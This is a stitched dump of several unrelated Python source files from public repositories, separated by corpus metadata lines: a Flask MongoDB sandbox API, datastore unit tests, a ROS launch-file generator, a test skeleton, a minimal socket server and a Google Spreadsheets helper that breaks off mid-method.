# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import uuid
from datetime import datetime, timedelta
from functools import update_wrapper

from bson import BSON
from bson.errors import BSONError, InvalidBSON, InvalidStringData
from bson.json_util import dumps, loads
from flask import Blueprint, current_app, make_response, request, session
from pymongo.errors import (InvalidDocument, OperationFailure,
                            InvalidId, DuplicateKeyError)

from webapps.lib import CLIENTS_COLLECTION
from webapps.lib.MWSServerError import MWSServerError
from webapps.lib.db import get_db
from webapps.lib.decorators import check_session_id, ratelimit
from webapps.lib.util import (
    UseResId,
    get_collection_names
)

app = current_app
mws = Blueprint('mws', __name__, url_prefix='/mws')
def generate_res_id():
    """Return a fresh resource id as a canonical UUID4 string."""
    return '%s' % uuid.uuid4()
def empty_success():
    """Body/status pair for a 204 No Content response."""
    return ('', 204)
def parse_get_json():
    """Decode the request payload (body, or the 'data' query argument)
    into request.json; malformed input becomes a 400 MWSServerError."""
    try:
        raw = request.data or request.args['data']
        request.json = loads(raw) if raw else {}
    except (InvalidId, TypeError, ValueError) as e:
        raise MWSServerError(400, str(e))
def to_json(result):
    """Serialize *result* to a (json_body, 200) pair.

    Raises MWSServerError(500) when the result cannot be represented as
    JSON.
    """
    try:
        return dumps(result), 200
    except (TypeError, ValueError):
        # TypeError added: unserializable objects now yield a clean 500
        # instead of an uncaught exception.  The original message blamed
        # "find", but this helper serves every endpoint.
        error = 'Error while trying to convert the results to JSON format.'
        raise MWSServerError(500, error)
@mws.after_request
def no_cache(response):
    """Mark every outgoing response as uncacheable."""
    response.headers['Expires'] = 0
    response.cache_control.no_cache = True
    return response
def validate_document_or_list(document):
    """Validate a single document, or each document in a list."""
    docs = document if isinstance(document, list) else [document]
    for doc in docs:
        validate_document(doc)
def validate_document(document):
    """Ensure *document* is a dict that can be BSON-encoded.

    Raises MWSServerError(400) otherwise.
    """
    if not isinstance(document, dict):
        raise MWSServerError(400,
            u"Could not validate '{0}', expected a document".format(document))
    try:
        BSON.encode(document)
    # BUG FIX: BSONError, InvalidBSON and InvalidStringData were used
    # here without ever being imported, so any encode failure raised a
    # NameError instead of the intended 400.  They are now imported from
    # bson.errors at the top of the file.
    except (InvalidDocument,
            TypeError,
            InvalidId,
            BSONError,
            InvalidBSON,
            InvalidStringData
            ) as e:
        raise MWSServerError(400, str(e))
def calculate_document_size(document):
    """Return the BSON-encoded size in bytes of a document, or the total
    size of a list of documents."""
    if isinstance(document, list):
        return sum(calculate_document_size(d) for d in document)
    return len(BSON.encode(document))
@mws.route('/', methods=['POST'])
def create_mws_resource():
    """Create (or re-use) a sandbox resource id for the caller's session.

    Returns JSON {'res_id': ..., 'is_new': ...}.
    """
    # Reuse the browser session id when present; otherwise mint one.
    session_id = session.get('session_id', str(uuid.uuid4()))
    session['session_id'] = session_id
    clients = get_db()[CLIENTS_COLLECTION]

    # Look for an existing resource bound to this session.
    cursor = clients.find({'session_id': session_id}, {'res_id': 1, '_id': 0})
    if cursor.count():
        # TODO: handle multiple res_id per session
        res_id = cursor[0]['res_id']
        is_new = False
    else:
        res_id = generate_res_id()
        clients.insert({
            'version': 1,
            'res_id': res_id,
            'collections': [],
            'session_id': session_id,
            'timestamp': datetime.now()
        })
        is_new = True
    return to_json({'res_id': res_id, 'is_new': is_new})
@mws.route('/<res_id>/keep-alive', methods=['POST'])
@check_session_id
def keep_mws_alive(res_id):
    """Refresh the timestamp on the session's resource so it is not
    treated as expired."""
    clients = get_db()[CLIENTS_COLLECTION]
    clients.update({'session_id': session.get('session_id'), 'res_id': res_id},
                   {'$set': {'timestamp': datetime.now()}})
    return empty_success()
# Read Methods
@mws.route('/<res_id>/db/<collection_name>/find', methods=['GET'])
@check_session_id
@ratelimit
def db_collection_find(res_id, collection_name):
    """Run find() on the sandboxed collection and return matching
    documents as JSON {'result': [...]}."""
    parse_get_json()
    query = request.json.get('query')
    projection = request.json.get('projection')
    skip = request.json.get('skip', 0)
    limit = request.json.get('limit', 0)
    sort = request.json.get('sort', {})
    # Convert the {field: direction} mapping into the list of
    # (field, direction) pairs that pymongo's sort() expects.
    sort = sort.items()
    with UseResId(res_id) as db:
        coll = db[collection_name]
        try:
            cursor = coll.find(query, projection, skip, limit)
            if len(sort) > 0:
                cursor.sort(sort)
            documents = list(cursor)
        except (InvalidId, TypeError, OperationFailure) as e:
            raise MWSServerError(400, str(e))
        return to_json({'result': documents})
@mws.route('/<res_id>/db/<collection_name>/count', methods=['GET'])
@check_session_id
@ratelimit
def db_collection_count(res_id, collection_name):
    """Return the number of documents matching the optional query as
    JSON {'count': n}."""
    parse_get_json()
    query = request.json.get('query')
    with UseResId(res_id) as db:
        coll = db[collection_name]
        try:
            count = coll.find(query).count()
            return to_json({'count': count})
        except InvalidDocument as e:
            raise MWSServerError(400, str(e))
@mws.route('/<res_id>/db/<collection_name>/aggregate', methods=['GET'])
@check_session_id
def db_collection_aggregate(res_id, collection_name):
    """Run the aggregation pipeline from the request body on the
    sandboxed collection."""
    # NOTE(review): unlike find/count, this endpoint carries no
    # @ratelimit decorator -- confirm whether that omission is intended.
    parse_get_json()
    with UseResId(res_id) as db:
        try:
            result = db[collection_name].aggregate(request.json)
        except (InvalidId,
                TypeError,
                InvalidDocument,
                OperationFailure) as e:
            raise MWSServerError(400, str(e))
    return to_json(result)
# Write Methods
@mws.route('/<res_id>/db/<collection_name>/insert', methods=['POST'])
@check_session_id
@ratelimit
def db_collection_insert(res_id, collection_name):
    """Insert a document (or list of documents) after validating it and
    enforcing the per-collection size quota.  Returns {'_id': ...}."""
    parse_get_json()
    document = request.json.get('document')
    if document is None:
        raise MWSServerError(400,
            "no object passed to insert!")
    validate_document_or_list(document)
    req_size = calculate_document_size(document)
    # Insert document
    with UseResId(res_id) as db:
        # Check quota before writing so an oversized insert is rejected.
        size = db[collection_name].size()
        if size + req_size > current_app.config['QUOTA_COLLECTION_SIZE']:
            raise MWSServerError(403, 'Collection size exceeded')
        # Attempt Insert
        try:
            _id = db[collection_name].insert(document)
        except (DuplicateKeyError, OperationFailure) as e:
            raise MWSServerError(400, str(e))
    return to_json({'_id': _id})
@mws.route('/<res_id>/db/<collection_name>/update', methods=['PUT'])
@check_session_id
@ratelimit
def db_collection_update(res_id, collection_name):
    """Update documents matching 'query' with 'update', honoring the
    upsert/multi flags and the collection size quota."""
    parse_get_json()
    query = request.json.get('query')
    update = request.json.get('update')
    upsert = request.json.get('upsert', False)
    multi = request.json.get('multi', False)
    if query is None or update is None:
        error = 'update requires spec and document arguments'
        raise MWSServerError(400, error)
    with UseResId(res_id) as db:
        # Check quota
        coll = db[collection_name]
        # Computation of worst case size increase - update size * docs affected
        # It would be nice if we were able to make a more conservative estimate
        # of the space difference that an update will cause. (especially if it
        # results in smaller documents)
        # TODO: Make this more intelligent. I'm not sure that this even makes sense.
        affected = coll.find(query).count()
        req_size = calculate_document_size(update) * affected
        size = db[collection_name].size()
        if size + req_size > current_app.config['QUOTA_COLLECTION_SIZE']:
            raise MWSServerError(403, 'Collection size exceeded')
        # Attempt Update
        try:
            db[collection_name].update(query, update, upsert, multi=multi)
            return empty_success()
        except (DuplicateKeyError,
                InvalidDocument,
                InvalidId,
                TypeError,
                OperationFailure) as e:
            raise MWSServerError(400, str(e))
@mws.route('/<res_id>/db/<collection_name>/save', methods=['POST'])
@check_session_id
@ratelimit
def db_collection_save(res_id, collection_name):
    """Save (insert-or-replace) a single validated document, enforcing
    the collection size quota."""
    parse_get_json()
    document = request.json.get('document')
    if document is None:
        raise MWSServerError(400,
            "'document' argument not found in the save request.")
    validate_document(document)
    req_size = calculate_document_size(document)
    # Get database
    with UseResId(res_id) as db:
        # Check quota
        size = db[collection_name].size()
        if size + req_size > current_app.config['QUOTA_COLLECTION_SIZE']:
            raise MWSServerError(403, 'Collection size exceeded')
        # Save document
        try:
            db[collection_name].save(document)
            return empty_success()
        except (InvalidId, TypeError, InvalidDocument, DuplicateKeyError) as e:
            raise MWSServerError(400, str(e))
@mws.route('/<res_id>/db/<collection_name>/remove', methods=['DELETE'])
@check_session_id
@ratelimit
def db_collection_remove(res_id, collection_name):
    """Remove documents matching 'constraint'; 'just_one' restricts the
    removal to a single matching document."""
    parse_get_json()
    # NOTE(review): when a JSON body is present but lacks 'constraint',
    # this passes None rather than {} to remove() -- verify both are
    # treated as "match everything" by the pymongo version in use.
    constraint = request.json.get('constraint') if request.json else {}
    just_one = request.json and request.json.get('just_one', False)
    with UseResId(res_id) as db:
        collection = db[collection_name]
        try:
            if just_one:
                collection.find_and_modify(constraint, remove=True)
            else:
                collection.remove(constraint)
        except (InvalidDocument, InvalidId, TypeError, OperationFailure) as e:
            raise MWSServerError(400, str(e))
    return empty_success()
@mws.route('/<res_id>/db/<collection_name>/drop', methods=['DELETE'])
@check_session_id
@ratelimit
def db_collection_drop(res_id, collection_name):
    """Drop the named collection from the sandboxed database."""
    with UseResId(res_id) as db:
        db.drop_collection(collection_name)
    return empty_success()
@mws.route('/<res_id>/db', methods=['DELETE'])
@check_session_id
def db_drop(res_id):
    """Drop the session's entire sandboxed database."""
    with UseResId(res_id) as db:
        db.drop_database()
    return empty_success()
@mws.route('/<res_id>/db/getCollectionNames', methods=['GET'])
@check_session_id
def db_get_collection_names(res_id):
    """List the collection names in the session's sandboxed database."""
    return to_json({'result': get_collection_names(res_id)})
|
UTF-8
|
Python
| false | false | 2,014 |
16,174,846,881,038 |
506936d97fa3b4c57556e9267e03e7df0e289571
|
b5db4abae9a6fbaa514d0e9aa081a84d3901ad0c
|
/goanna/tests/test_goanna_datastore.py
|
627d953b52e39760a483747fc52af2983a9299a3
|
[
"BSD-2-Clause"
] |
permissive
|
shawnchin/goanna
|
https://github.com/shawnchin/goanna
|
f898715e03d43666d058596f1197ed6a5981d0ea
|
7998ffa7cabf3a6168de62dee54468f84950ca36
|
refs/heads/master
| 2016-09-05T19:57:42.772422 | 2012-12-17T16:55:00 | 2012-12-17T16:55:00 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import unittest
from goanna.datastore import DictStore, RedisStore
from goanna.exceptions import DatastoreError
class DictStoreTestCase(unittest.TestCase):
    """Exercises the in-memory DictStore key/value and sorted-set API."""

    def setUp(self):
        self.d = DictStore()
        # patch for python <2.7
        if not hasattr(self, "assertIsNone"):
            def _assert_is_none(v):
                # BUG FIX (idiom): compare to None by identity, not
                # equality, so an object with a permissive __eq__ cannot
                # fool the assertion.
                self.assertTrue(v is None)
            self.assertIsNone = _assert_is_none

    def test_basic_query(self):
        """Round-trip store/retrieve/delete for single and bulk keys."""
        self.d.store("k1", "v1")
        self.d.store("k3", "v3")
        data = {"k5": "v5", "k7": "v7"}
        self.d.store_many(data.iteritems())
        self.assertIsNone(self.d.retrieve("k2"))
        self.assertIsNone(self.d.retrieve("k6"))
        self.assertEqual(self.d.retrieve("k1"), "v1")
        self.assertEqual(self.d.retrieve("k5"), "v5")
        self.assertEqual(self.d.delete("k2"), 0)
        self.assertEqual(self.d.delete("k6"), 0)
        self.assertEqual(self.d.delete("k1"), 1)
        self.assertEqual(self.d.delete("k5"), 1)
        self.assertIsNone(self.d.retrieve("k1"))
        self.assertIsNone(self.d.retrieve("k5"))
        self.assertEqual(self.d.retrieve("k3"), "v3")
        self.assertEqual(self.d.retrieve("k7"), "v7")

    def test_encoding(self):
        """Non-string values are stored as their string representation."""
        self.d.store("v_int", 100)
        self.d.store("v_list", [1, 2])
        self.d.store("v_unicode", unicode("hello"))
        self.assertEqual(self.d.retrieve("v_int"), "100")
        self.assertEqual(self.d.retrieve("v_list"), "[1, 2]")
        self.assertEqual(self.d.retrieve("v_unicode"), "hello")

    def test_sorted_set(self):
        """Score-ordered add/retrieve/delete, including range queries."""
        d = self.d
        self.assertIsNone(d.sortedset_retrieve_latest("sk"))
        d.sortedset_add("sk", "v1", 101.01)
        d.sortedset_add("sk", "v2", 102.01)
        self.assertEqual(d.sortedset_retrieve_latest("sk"), ("v2", 102.01))
        d.sortedset_add_many([
            ("sk", "v3", 304.01),
            ("sk", "v4", 405.01),
            ("sk", "v1", 900.91)  # updates v1
        ])
        self.assertEqual(d.sortedset_retrieve_latest("sk"), ("v1", 900.91))
        # retrieve using various ranges
        self.assertEqual(d.sortedset_retrieve_range("sk"),
                         ["v2", "v3", "v4", "v1"])
        self.assertEqual(d.sortedset_retrieve_range("sk", 102.01),
                         ["v3", "v4", "v1"])
        self.assertEqual(d.sortedset_retrieve_range("sk", upper=304.01),
                         ["v2"])
        self.assertEqual(d.sortedset_retrieve_range("sk", 102.01, 405.1001),
                         ["v3", "v4"])
        self.assertEqual(d.sortedset_retrieve_range("sk", 900.91), [])
        self.assertEqual(d.sortedset_retrieve_range("sk", upper=101.01), [])
        # delete by range
        self.assertEqual(d.sortedset_delete_range("sk", lower=900.91), 0)
        self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
        self.assertEqual(d.sortedset_delete_range("sk", upper=100.11), 0)
        self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
        self.assertEqual(d.sortedset_delete_range("sk", 305.01, 405.01), 0)
        self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
        self.assertEqual(d.sortedset_delete_range("sk", 300.01, 410.01), 2)
        self.assertEqual(d.sortedset_retrieve_range("sk"), ["v2", "v1"])
class RedisStoreTestCase(unittest.TestCase):
    """Exercises the RedisStore backend against a local test database."""

    def setUp(self):
        params = {
            "host": "localhost",
            "port": 6379,
            "db": 9
        }
        self.d = RedisStore(**params)
        # Access the redis client directly and ensure that the test db is
        # currently empty (so we don't accidentally change production data)
        if self.d.r.dbsize() != 0:
            raise Exception("""SELECTED REDIS DB NOT EMPTY.
Using: %(host)s:%(port)d (db %(db)d)
To proceed, make sure that is not your production db. Once you're certain
you can flush that db by running:
   redis-cli -h %(host)s -p %(port)d -n %(db)d flushdb
""" % params)
        # patch for python <2.7
        if not hasattr(self, "assertIsNone"):
            def _assert_is_none(v):
                # BUG FIX (idiom): identity comparison instead of '== None'.
                self.assertTrue(v is None)
            self.assertIsNone = _assert_is_none

    def tearDown(self):
        self.d.r.flushdb()  # flush testdb before quitting

    def test_basic_query(self):
        """Round-trip store/retrieve/delete for single and bulk keys."""
        self.d.store("k1", "v1")
        self.d.store("k3", "v3")
        data = {"k5": "v5", "k7": "v7"}
        self.d.store_many(data.iteritems())
        self.assertIsNone(self.d.retrieve("k2"))
        self.assertIsNone(self.d.retrieve("k6"))
        self.assertEqual(self.d.retrieve("k1"), "v1")
        self.assertEqual(self.d.retrieve("k5"), "v5")
        self.assertEqual(self.d.delete("k2"), 0)
        self.assertEqual(self.d.delete("k6"), 0)
        self.assertEqual(self.d.delete("k1"), 1)
        self.assertEqual(self.d.delete("k5"), 1)
        self.assertIsNone(self.d.retrieve("k1"))
        self.assertIsNone(self.d.retrieve("k5"))
        self.assertEqual(self.d.retrieve("k3"), "v3")
        self.assertEqual(self.d.retrieve("k7"), "v7")

    def test_sorted_set(self):
        """Score-ordered add/retrieve/delete, including range queries."""
        d = self.d
        self.assertIsNone(d.sortedset_retrieve_latest("sk"))
        d.sortedset_add("sk", "v1", 101.0)
        d.sortedset_add("sk", "v2", 102.0)
        self.assertEqual(d.sortedset_retrieve_latest("sk"), ("v2", 102.0))
        d.sortedset_add_many([
            ("sk", "v3", 304.0),
            ("sk", "v4", 405.0),
            ("sk", "v1", 900.9)  # updates v1
        ])
        self.assertEqual(d.sortedset_retrieve_latest("sk"), ("v1", 900.9))
        # retrieve using various ranges
        self.assertEqual(d.sortedset_retrieve_range("sk"),
                         ["v2", "v3", "v4", "v1"])
        self.assertEqual(d.sortedset_retrieve_range("sk", 102.0),
                         ["v3", "v4", "v1"])
        self.assertEqual(d.sortedset_retrieve_range("sk", upper=304.0),
                         ["v2"])
        self.assertEqual(d.sortedset_retrieve_range("sk", 102.0, 405.00001),
                         ["v3", "v4"])
        self.assertEqual(d.sortedset_retrieve_range("sk", 900.9), [])
        self.assertEqual(d.sortedset_retrieve_range("sk", upper=101.0), [])
        # delete by range
        self.assertEqual(d.sortedset_delete_range("sk", lower=900.9), 0)
        self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
        self.assertEqual(d.sortedset_delete_range("sk", upper=100), 0)
        self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
        self.assertEqual(d.sortedset_delete_range("sk", 305, 405.0), 0)
        self.assertEqual(len(d.sortedset_retrieve_range("sk")), 4)
        self.assertEqual(d.sortedset_delete_range("sk", 300, 410.0), 2)
        self.assertEqual(d.sortedset_retrieve_range("sk"), ["v2", "v1"])
|
UTF-8
|
Python
| false | false | 2,012 |
14,396,730,379,032 |
982bbb210118dcc2b92f2fd5ace5766a80b76d36
|
fb3d5b9ce8fee4f87c9b1426afdf446188656052
|
/projector_interface/study/configure_screen.py
|
3ba4d9127aa74980d16fcc1f7ec15717c0e4d3a3
|
[] |
no_license
|
OSUrobotics/ros-3d-interaction
|
https://github.com/OSUrobotics/ros-3d-interaction
|
9e25ed88a5226e2a5640f213572b6d4c79e843df
|
d5419cbaebec704469b0cc0992654c8ca40a7c79
|
refs/heads/groovy-devel
| 2016-08-07T09:41:04.899680 | 2014-03-27T20:00:09 | 2014-03-27T20:00:09 | 6,081,570 | 4 | 1 | null | false | 2013-05-01T15:33:47 | 2012-10-04T20:33:18 | 2013-05-01T15:33:46 | 2013-05-01T15:19:42 | 1,060 | null | 0 | 3 |
Python
| null | null |
#!/usr/bin/env rosh
load('rosh_geometry', globals())
from lxml import etree
from lxml.etree import Element
import os
from tf.transformations import quaternion_from_euler
from math import pi
def make_tf_pub(parent, child, transform):
    """Build a launch-file <node> element that runs tf's
    static_transform_publisher broadcasting *transform* from *parent*
    to *child* every 100 ms."""
    pos = transform.pose.position
    quat = transform.pose.orientation
    # Argument order expected by static_transform_publisher:
    # x y z qx qy qz qw parent child period_ms
    args = '%s %s %s %s %s %s %s %s %s 100' % (
        pos.x, pos.y, pos.z,
        quat.x, quat.y, quat.z, quat.w,
        parent, child)
    return Element(
        'node',
        type='static_transform_publisher',
        pkg='tf',
        name='%s_to_%s' % (parent, child),
        args=args
    )
# Marker frame names as published by the calibration markers.
top_right = 'top_right'
bottom_left = 'bottom_left'
# top level launch file
launch_tree = Element('launch')
launch_tree.append(Element(
    'param',
    name='/screen/frame',
    value=bottom_left,
))
# make a static transform publisher for the bottom left marker
# this is the frame the interface is composed in
# NOTE(review): 'transforms', Time and Duration come from the rosh
# environment loaded at the top of the file.
transforms._config.listener.waitForTransform(bottom_left, top_right, Time(0), Duration(5))
parent = transforms[bottom_left]._config.listener.chain(bottom_left, Time(0), '/', Time(0), '/')[0]
tr = transforms[parent](bottom_left)
elem = make_tf_pub(parent, bottom_left, tr)
launch_tree.append(elem)
# add some args for the optical rotate
elem_pi = Element('arg', name='pi/2', value='1.5707963267948966')
elem_optical_rotate = Element('arg', name='optical_rotate', value='0 0 0 -$(arg pi/2) 0 -$(arg pi/2)')
launch_tree.append(elem_pi)
launch_tree.append(elem_optical_rotate)
# first we need the camera link
parent = 'projector_cam_rgb_optical_frame'
transform = PoseStamped(frame_id='world', position=Point(0,0,0.5), orientation=Quaternion(0,0,0,1))
elem = make_tf_pub('world', 'projection_cam_link', transform)
launch_tree.append(elem)
# now we need to reorient things for the optical frame
# x = right (forward)
# y = down (left)
# z = forward (up)
transform = PoseStamped(frame_id='world', position=Point(0,0,0.5), orientation=Quaternion(*quaternion_from_euler(-pi/2,0,-pi/2)))
# elem = make_tf_pub('projection_cam_link', parent, transform)
elem_projection_cam_optical_rotate = Element(
    'node',
    type='static_transform_publisher',
    pkg='tf',
    name='projector_cam_optical_rotate',
    args='$(arg optical_rotate) projection_cam_link %s 100' % parent
)
launch_tree.append(elem_projection_cam_optical_rotate)
# make a transform for the kinect
# same place as camera, but pointing backwards
orientation = quaternion_from_euler(0,0,pi)
transform.pose.orientation = Quaternion(*orientation)
transform.child_frame_id = 'face_cam_link'
elem = make_tf_pub('world', 'face_cam_link', transform)
launch_tree.append(elem)
# figure out how big the screen is
# (the top-right marker position in the bottom-left frame gives w x h)
tr = transforms.bottom_left('top_right')
width, height = tr.pose.position.x, tr.pose.position.y
launch_tree.append(Element(
    'param',
    name='/screen/width',
    value=str(width),
    type='double'
))
launch_tree.append(Element(
    'param',
    name='/screen/height',
    value=str(height),
    type='double'
))
# NOTE(review): the params are set as strings here while the launch file
# declares them as doubles -- confirm consumers tolerate string values.
rospy.set_param('/screen/width', str(width))
rospy.set_param('/screen/height', str(height))
# wait for a homography
# NOTE(review): rospy is used above this import; presumably rosh already
# injected it into globals -- verify.
import rospy
while not rospy.has_param('/homography'):
    rospy.sleep(0.1)
homography = rospy.get_param('/homography')
elem_h = Element('rosparam', param='/homography')
elem_h.text = str(homography)
launch_tree.append(elem_h)
launch_path = os.path.join(roslib.packages.get_pkg_dir('projector_interface'), 'study', 'launch', 'setup.launch')
# with etree.xmlfile(launch_path) as lf:
with open(launch_path, 'w') as lf:
    lf.write(etree.tostring(launch_tree, pretty_print=True))
print 'wrote', launch_path
# print etree.tostring(launch_tree, pretty_print=True)
|
UTF-8
|
Python
| false | false | 2,014 |
3,461,743,669,065 |
b00d1fe78d5c91d786b2195b70e74b41f776e83f
|
064034a86bcd50481df1eb73fffc8b9f3ad19fbd
|
/matgendb/test_creator.py
|
7f4ec25f9fb9f909e8f246a47a9045cbdf2361ef
|
[
"MIT"
] |
permissive
|
cmgtam/pymatgen-db
|
https://github.com/cmgtam/pymatgen-db
|
82a395c051563aee572a599986da2f80a0a6de8e
|
01c6e9ee978c0ca12eb6b30b322beadeac0d0950
|
refs/heads/master
| 2021-01-15T23:27:31.006036 | 2013-06-24T19:22:09 | 2013-06-24T19:22:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import pymatgen
import os
import shutil
import sys
import unittest
import time
import filecmp
from filecmp import dircmp
from pymatgen.io.vaspio import Poscar
class TestCreator(unittest.TestCase):
    """Skeleton tests for inserting NEB runs into the database.

    NOTE(review): NEBToDbTaskDrone and util2 are referenced but never
    imported in this file -- the imports must be added before these
    tests can run.
    """

    def setUp(self):
        # BUG FIX: the drone was previously bound to a local variable,
        # so the test methods' references to it raised NameError; keep
        # it on self instead.
        self.myclass = NEBToDbTaskDrone("")
        # maybe mgdb insert? use mymgdb = subprocess.Popen(
        #     ["mgdb insert -c ..."], shell=True,
        #     stdout=subprocess.PIPE, stderr=subprocess.PIPE)

    def tearDown(self):
        # maybe create a different db.json file so the next test is a new database?
        pass

    def test_contour(self):
        # either run the query and get output, or test the drone's
        # document fields directly (as done here).
        testcontour = self.myclass.d['energy_contour']
        self.assertEquals(testcontour, "-x-/-x-\-x-")

    def test_maxminmin(self):
        # BUG FIX: the original body was not valid Python (unbalanced
        # brackets, bare '...' placeholders); reconstructed from the
        # apparent intent: the spread between the max and min energies
        # of the three NEB images.
        energy00 = util2.get_energy("OSZICAR00")
        energy01 = util2.get_energy("OSZICAR01")
        energy02 = util2.get_energy("OSZICAR02")
        energies = [energy00, energy01, energy02]
        maxminmin = max(energies) - min(energies)
        self.assertEquals(self.myclass.d['maxminmin'], maxminmin)
|
UTF-8
|
Python
| false | false | 2,013 |
11,957,188,953,603 |
ecb02678afaebfbec47cd396802f24d68965bc4f
|
c22deca4a74ef2898521892546a32f5ceafca21f
|
/server.py
|
bcdf144c46f4c7513502b047f3f8a0ba21594f86
|
[] |
no_license
|
ChristofferHolmesland/ms-kart
|
https://github.com/ChristofferHolmesland/ms-kart
|
54b3ed13eb31777337f6b19e1fd32e1a116ba729
|
e4ef79ccc9954836e64dfe674ad0b348b41e0e7c
|
refs/heads/master
| 2015-08-12T02:29:01.347534 | 2014-06-25T14:06:54 | 2014-06-25T14:06:54 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# -*- coding: utf-8 -*-
#server.py
import socket
import sys
# Placeholder globals; assigned real values in the __main__ block below.
HOST = None # '' - string
PORT = None # 8888 - integer
s = None # socket.socket() - socket
def startServer(socket_s, string_host, integer_port):
    """Bind *socket_s* to (host, port), listen, and accept one client.

    Returns False when the address cannot be bound (e.g. already in
    use); otherwise blocks until a client connects and returns the
    (connection, address) pair.
    """
    try:
        socket_s.bind((string_host, integer_port))
    # BUG FIX: 'except socket.error, msg:' is Python-2-only syntax and
    # the bound name was unused; the version-neutral form works on both.
    except socket.error:
        return False
    socket_s.listen(100)
    # BUG FIX: the accepted connection used to be discarded; return it
    # so the caller can actually talk to the client.
    conn, addr = socket_s.accept()
    return conn, addr
if __name__ == '__main__':
    # Concrete values for the placeholders above: listen on all
    # interfaces, port 8888.
    HOST = ''
    PORT = 8888
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    startServer(s, HOST, PORT)
|
UTF-8
|
Python
| false | false | 2,014 |
4,286,377,388,364 |
01ec460da8698efed09249696e7d8c206f850904
|
6419ec2206e2f8a1f6eae9e059da847309be1eea
|
/google_docs_helpers.py
|
8aa4a592ace38ff7eaf4f69a4204d4285cf2b679
|
[
"MIT"
] |
permissive
|
nesaro/google_docs_helpers
|
https://github.com/nesaro/google_docs_helpers
|
f087673896f14349392d04d1739cb8333be7e8d1
|
c96abe7ac4dc04b4e20af0d06dd8f63196b8391a
|
refs/heads/master
| 2021-01-23T20:00:19.390531 | 2014-09-12T09:31:33 | 2014-09-12T09:31:33 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#TODO: sort logging, better worksheet identifies (helpers?)
import gdata.spreadsheet
import gdata.docs.service
import gdata.spreadsheet.service
import re
import logging
from collections import OrderedDict
class GoogleSpreadsheetsClient(object):
    """Thin wrapper around gdata's SpreadsheetsService: login, header
    escaping, and bulk read/write of worksheet rows.

    (Made a new-style class -- 'class X():' was old-style on Python 2 --
    with no caller-visible change.)
    """

    def __init__(self, gmailUsername, gmailPassword, sSourceName='Default', bDebug=False):
        """Log in to Google Spreadsheets with the given credentials."""
        self.log = logging.getLogger('gDocsLogger')
        self.spr_client = gdata.spreadsheet.service.SpreadsheetsService()
        self.spr_client.email = gmailUsername
        self.spr_client.password = gmailPassword
        self.spr_client.source = sSourceName
        self.spr_client.http_client.debug = bDebug
        self.spr_client.ProgrammaticLogin()

    def ExposeClient(self):
        """Exposes the Google spreadsheets client in case you need to do
        anything further to it."""
        return self.spr_client

    def CreateTableHeaders(self, sSpreadsheetKey, sWorksheetId, aHeaders):
        """Writes *aHeaders* into row 1 of the worksheet."""
        self.log.info('Adding headers to worksheet ' + sWorksheetId)
        self.log.debug(aHeaders)
        # Spreadsheet columns are 1-based; enumerate from 1 instead of
        # incrementing a counter inside the loop.
        for i, header in enumerate(aHeaders, 1):
            self.log.debug('%s - %s' % (i, header))
            self.spr_client.UpdateCell(row=1, col=i, inputValue=header, key=sSpreadsheetKey, wksht_id=sWorksheetId)
        self.log.info('Headers added ok')

    def EscapeHeader(self, header):
        """Makes a header that gdocs can deal with: lower-cased with
        everything outside [0-9a-z-] stripped."""
        header = header.lower()
        #header = re.sub('[\s_]+','-',header)
        header = re.sub('[^0-9a-z-]+', '', header)
        return header

    def CreateTable(self, sSpreadsheetKey, sWorksheetId, aRows):
        """Creates a new table (headers plus all rows) from scratch."""
        self.log.info('Creating a new table on worksheet %s', sWorksheetId)
        # Headers come from the keys of the first row.
        aHeaders = [self.EscapeHeader(key) for key in aRows[0]]
        self.CreateTableHeaders(sSpreadsheetKey, sWorksheetId, aHeaders)
        i = 0
        for row in aRows:
            # Keys are escaped the same way as the headers; values are
            # stringified for the gdata API.
            dRow = dict((self.EscapeHeader(key), str(value))
                        for key, value in row.items())
            self.log.debug(dRow)
            self.spr_client.InsertRow(dRow, sSpreadsheetKey, wksht_id=sWorksheetId)
            i += 1
        self.log.info('%s rows added', i)

    def GetGoogleWorksheets(self, sSpreadsheetKey):
        """Gets the tabs of the spreadsheet, keyed both by id and name."""
        self.log.info('Getting worksheets')
        fWorksheets = self.spr_client.GetWorksheetsFeed(sSpreadsheetKey)
        dWorksheets = {}
        dWorksheets2 = {}
        # The loop index was unused; iterate the entries directly.
        for entry in fWorksheets.entry:
            wid = entry.id.text.split('/')[-1]
            name = entry.title.text
            dWorksheets[wid] = name
            dWorksheets2[name] = wid
        ret = {'worksheets_by_id': dWorksheets, 'worksheets_by_name': dWorksheets2}
        self.log.info(ret)
        return ret

    def EmptyGoogleWorksheet(self, sSpreadsheetKey, sWorksheetId):
        """Nukes the worksheet in question from orbit (blanks all cells
        in one batch request)."""
        self.log.info('Emptying worksheet ' + sWorksheetId)
        batch = gdata.spreadsheet.SpreadsheetsCellsFeed()
        fWorksheetCellsFeed = self.spr_client.GetCellsFeed(key=sSpreadsheetKey, wksht_id=sWorksheetId)
        for entry in fWorksheetCellsFeed.entry:
            entry.cell.inputValue = ''
            batch.AddUpdate(entry)
        self.spr_client.ExecuteBatch(batch, fWorksheetCellsFeed.GetBatchLink().href)

    def GetHeadersFromWorksheet(self, sSpreadsheetKey, sWorksheetId):
        """Gets the (escaped) headers from the first row of a worksheet."""
        headers = []
        feed = self.spr_client.GetCellsFeed(sSpreadsheetKey, sWorksheetId)
        for entry in feed.entry:
            # The cells feed is in row-major order: stop at the first
            # cell beyond row 1.
            if int(entry.cell.row) >= 2:
                break
            headers.append(self.EscapeHeader(entry.content.text))
        return headers

    def GetRowsFromWorksheet(self, sSpreadsheetKey, sWorksheetId):
        """Gets the rows from a worksheet as ordered dicts ('id' first)."""
